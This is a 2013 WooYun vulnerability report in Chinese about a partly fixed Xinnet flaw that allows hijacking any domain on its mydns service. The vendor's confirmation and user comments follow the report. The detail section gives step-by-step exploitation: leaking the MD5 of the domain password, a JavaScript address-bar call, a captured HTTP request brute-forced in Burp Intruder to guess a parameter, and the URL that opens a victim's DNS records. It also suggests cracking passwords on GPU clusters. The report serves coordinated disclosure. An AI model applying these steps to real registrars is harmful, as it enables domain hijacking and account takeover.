当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020061

漏洞标题:新网已补漏洞继续利用(使用mydns的所有域名劫持)

相关厂商:新网华通信息技术有限公司

漏洞作者: Finger

提交时间:2013-03-14 16:34

修复时间:2013-04-28 16:34

公开时间:2013-04-28 16:34

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-14: 细节已通知厂商并且等待厂商处理中
2013-03-18: 厂商已经确认,细节仅向厂商公开
2013-03-28: 细节向核心白帽子及相关领域专家公开
2013-04-07: 细节向普通白帽子公开
2013-04-17: 细节向实习白帽子公开
2013-04-28: 细节向公众公开

简要描述:

新网已补漏洞继续利用(使用mydns的所有域名劫持)

详细说明:

WooYun: 新网漏洞之主机管理越权和使用mydns的所有域名劫持
漏洞补了 但漏洞补的不够严谨
最重要的是 能够获取域名管理密码的MD5值始终是个漏洞(未补)
取得管理密码MD5值 即便没有其他地方来利用这个MD5密码 使用暴力碰撞解密MD5 获得域名的管理密码 登陆域名自主管理平台http://dcp.xinnet.com还是会对用户造成危害
新网域名管理密码系统随机生成的密码为8位大小写字母+数字的组合 现在用好点儿的显卡跑 组成集群去破解 应该不会太久 攻击一个大点儿的目标 跑几个月 一年都是值得的
言归正传 说说 WooYun: 新网漏洞之主机管理越权和使用mydns的所有域名劫持 未能修补的问题
http://mydns3.xinnet.com/mydns/recordsList.do?DomainName=xinnet.com&mystring=[MD5]&mystring2=[跟代理商有关的一个编号]
登陆新闻代理平台 进入【域名管理】=》【服务器商品】页面
在地址栏执行:javascript:submitDNSFormaaa('域名') 会打开一个域名管理页面
我们在【国际域名实名审核资料提交】中获取该域名管理密码的md5值留用
在代理商域名管理页面随便打开一个域名的Mydns 用Burp代理截取

GET /mydns/recordsList.do?DomainName=xinnet.com&mystring=[MD5]&mystring2=[跟代理商有关的一个编号] HTTP/1.1
Accept: */*
Referer: http://agent.xinnet.com/domain/manage.do?method=list&serviceState=02&forward=inusing
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Cookie: 
cookie内容
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Pragma: no-cache
Host: mydns3.xinnet.com


发送至intruder 将域名和MD5替换成攻击目标的 我们来猜解mystring2的值
mystring2一般为136开头共7位
猜解出mystring2的值之后
我们在一个已经打开的域名mydns管理页面直接输入url(利用该cookie):
http://mydns3.xinnet.com/mydns/recordsList.do?DomainName=[目标域名]&mystring=[目标域名的MD5]&mystring2=[跟代理商有关的一个编号]
这样就进入了目标域名的Mydns管理页面
之后劫持吧 伙计!
说明可能有点儿乱 如果不能复现 可以联系我。

漏洞证明:

漏洞受害者由新网出演:
我们的目标:xinnet.com

_20130314161209.jpg


_20130314162642.jpg


_20130314162745.jpg


_20130314163040.jpg


修复方案:

版权声明:转载请注明来源 Finger@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-03-18 14:02

厂商回复:

非常感谢!漏洞报告已收到

最新状态:

暂无

漏洞评价:

评论

  1. 2013-03-14 16:34 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    风中凌乱了

  2. 2013-03-14 17:03 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    风中凌乱了

  3. 2013-03-14 17:44 | 影刺 ( 实习白帽子 | Rank:67 漏洞数:25 | 关注web安全)

    疯中凌乱了。

  4. 2013-03-14 18:07 | Hxai11 ( 普通白帽子 | Rank:1137 漏洞数:218 | 于是我们奋力向前游,逆流而上的小舟,不停...)

    lz专注新网漏洞三十年,从未变过。

  5. 2013-03-14 18:41 | 溪水流淌 ( 路人 | Rank:9 漏洞数:2 | 如果一切都任我欲为,我会有迷失在这自由深...)

    疯中凌乱了。

  6. 2013-03-14 22:19 | Passer_by ( 实习白帽子 | Rank:97 漏洞数:21 | 问题真实存在但是影响不大(腾讯微博Passer...)

    风中凌乱了

  7. 2013-03-15 00:06 | 小色 ( 路人 | Rank:0 漏洞数:1 | 撸的一手好管)

    撸主在来一季 就把WB全送给你

  8. 2013-03-15 08:49 | null ( 路人 | Rank:15 漏洞数:2 | 左岸是无法忘却的回忆,右岸是值得把握的青...)

    新网的人恨不得马上查楼主水表

  9. 2013-03-15 10:46 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    我凌乱了。

  10. 2013-03-15 11:21 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    各种凌乱

  11. 2013-03-15 13:53 | 小黑要低调 ( 实习白帽子 | Rank:47 漏洞数:4 | 小黑一枚)

    最佳洞主又要成最撸力的了